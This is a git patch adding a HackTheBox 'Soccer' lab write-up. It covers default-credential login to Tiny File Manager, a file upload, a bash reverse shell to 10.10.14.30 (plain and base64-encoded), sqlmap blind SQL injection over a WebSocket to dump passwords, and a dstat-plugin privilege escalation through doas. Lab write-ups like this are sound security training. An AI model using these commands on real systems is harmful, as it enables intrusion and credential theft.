From 18a4d478b8179b3818da8dbfe3a777b48e4af896 Mon Sep 17 00:00:00 2001
From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Fri, 23 Jun 2023 22:21:31 +0500
Subject: [PATCH] Create Soccer.md
---
HackTheBox/Soccer.md | 214 +++++++++++++++++++++++++++++++++++++++++++
1 file changed, 214 insertions(+)
create mode 100644 HackTheBox/Soccer.md
diff --git a/HackTheBox/Soccer.md b/HackTheBox/Soccer.md
new file mode 100644
index 0000000..010a47d
--- /dev/null
+++ b/HackTheBox/Soccer.md
@@ -0,0 +1,214 @@
+# HackTheBox - Soccer
+
+## NMAP
+
+```bash
+Nmap scan report for 10.10.11.194
+Host is up (0.11s latency).
+Not shown: 65532 closed tcp ports (reset)
+PORT STATE SERVICE VERSION
+22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+| 3072 ad0d84a3fdcc98a478fef94915dae16d (RSA)
+| 256 dfd6a39f68269dfc7c6a0c29e961f00c (ECDSA)
+|_ 256 5797565def793c2fcbdb35fff17c615c (ED25519)
+80/tcp open http nginx 1.18.0 (Ubuntu)
+|_http-title: Did not follow redirect to http://soccer.htb/
+| http-methods:
+|_ Supported Methods: GET HEAD POST OPTIONS
+|_http-server-header: nginx/1.18.0 (Ubuntu)
+9091/tcp open xmltec-xmlmail?
+| fingerprint-strings:
+| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, SSLSessionReq, drda, informix:
+| HTTP/1.1 400 Bad Request
+| Connection: close
+| GetRequest:
+| HTTP/1.1 404 Not Found
+| Content-Security-Policy: default-src 'none'
+| X-Content-Type-Options: nosniff
+| Content-Type: text/html; charset=utf-8
+| Content-Length: 139
+| Date: Mon, 19 Dec 2022 13:32:35 GMT
+| Connection: close
+|
+|
+|
+|
+| Error
+|
+|
+| Cannot GET /
+|
+|
+| HTTPOptions, RTSPRequest:
+| HTTP/1.1 404 Not Found
+| Content-Security-Policy: default-src 'none'
+| X-Content-Type-Options: nosniff
+```
+
+
+## PORT 80 (HTTP)
+
+Visting the site, we'll be redirected to `soccer.htb`, adding the domain name in `/etc/hosts` file
+
+
+
+
+
+On adding this domain in hosts file, we'll be able to vist the site
+
+
+
+Fuzzing for files and directories using `gobuster`
+
+
+
+Running with different wordlist, we'll find `/tiny`
+
+
+
+
+
+Try the default creds which are `admin:admin@123`, we'll be able to login
+
+
+
+Also the other credentials for low privleged user will work as well which are `user:12345`
+
+
+
+At the right bottom, we can see the version as well which is `2.4.3` , we can find the exploit for this which is an authenticated remote code execution through file upload, using the scripts for github or exploit-db won't work because it tries to upload in the tiny's root path which is `/var/www/html/tiny` but the scenario here is different as `tiny` folder is owned by root and the other users have only read access
+
+
+
+
+
+## Foothold
+
+But checking the tiny folder we have a folder named `uploads` in which have full access so we can upload our file there
+
+
+
+Uploading the php file
+
+```php
+
+```
+
+
+
+
+
+Getting a reverse shell with a bash base64 encoded payload
+
+```bash
+/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.30/5555 0>&1'
+
+echo 'L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMwLzU1NTUgMD4mMScK' | base64 -d | bash
+```
+
+
+
+Checking the nginx config files, we'll see `soc-player.htb` in `/etc/nginx/sites-available/`
+
+
+
+Which shows that there's another site on port 3000 running locally with the subdomain `soc-player.soccer.htb` , we can port forward using `chisel`
+
+
+
+
+
+We can try registering for an account
+
+
+
+After signing up, we can login
+
+
+
+We can see here an input field but it doesn't reflect anything, on entering with blank field it shows `?????`
+
+
+
+The reaons why it does that is
+
+
+
+This code creates a new WebSocket connection to the server at the specified URL `ws://soccer.htb:9091`. When the page finishes loading, it sets up an event listener for the `keypress` event on an input element with the id `id`, and specifies the function `keyOne` to be called when the event occurs. `The keyOne` function stops the event from propagating and, if the key pressed is the Enter key (keyCode 13), it calls the 'sendText' function.
+
+The `sendText` function sends a message to the server over the WebSocket connection. The message is a JSON object with a single field, "id", which contains the value of the input element. If the input element is empty, it calls the 'append' function with the string `????????`.
+
+The `ws.onmessage` function is called when the WebSocket connection receives a message from the server. It calls the 'append' function with the received message as an argument. The `append` function selects the first `p` element in the page and sets its text content to the specified message. It also has commented-out code to set the text color to a random color, but this is not currently being used.
+
+
+## Privilege Escalation (player)
+
+So here I tried running sqlmap hoping it will find as it's in json and chances are that it maybe vulnerable to blind sqli as there was an article realted to blind sqli in web sockets
+
+https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html
+
+Running `sqlmap` against the web socket by providing the JSON post request
+
+```bash
+sqlmap -u "ws://soccer.htb:9091" --data='{"id":"jjhhk"}' --batch --level 2 --risk 2
+```
+
+
+
+
+
+Continuing to dump the database, it takes too much time as it's blind so after seeing the database, table and column name and directly tried dumping the passwords
+
+
+
+```bash
+sqlmap -u "ws://soccer.htb:9091" --data='{"id":"jjhhk"}' --batch --level 2 --risk 2 -D soccer_db -T accounts -C password --dump
+```
+
+
+
+
+Running `sudo -l` to see what privileges we had results nothing but on running `find` command to see what files or folders are owned by `player` groups shows that we have access to `/usr/local/share/dstat`
+
+```bash
+find / -group "player" 2>/dev/null | grep -v '/proc'
+```
+
+
+
+`dstat` is a tool that allows getting statistics from the system like seeing the CPU resources memory and etc, having access to this folder we can place external dstat plugins
+
+
+
+## Privilege Escalation (root)
+
+But issue is we need to run dstat as root if we want those external plugins to be executed as the root user, so running `linpeas` I found `doas` available on this machine
+
+
+
+Interstingly there's doas which is an alternate of sudo to execute commands as other users, running this will show that we can run dstat as root user
+
+
+
+Creating an external plugin `uwu` by naming it `dstat_uwu.py` and calling it with `dstat --uwu` with doas
+
+```python
+import pty
+pty.spawn("/bin/bash")
+```
+
+```bash
+doas /usr/bin/dstat --uwu
+```
+
+
+
+
+
+## References
+
+- https://www.ctfiot.com/78939.html
+- https://github.com/febinrev/tinyfilemanager-2.4.3-exploit/blob/main/tiny_file_manager_exploit.py
+- https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html
+- https://linux.die.net/man/1/dstat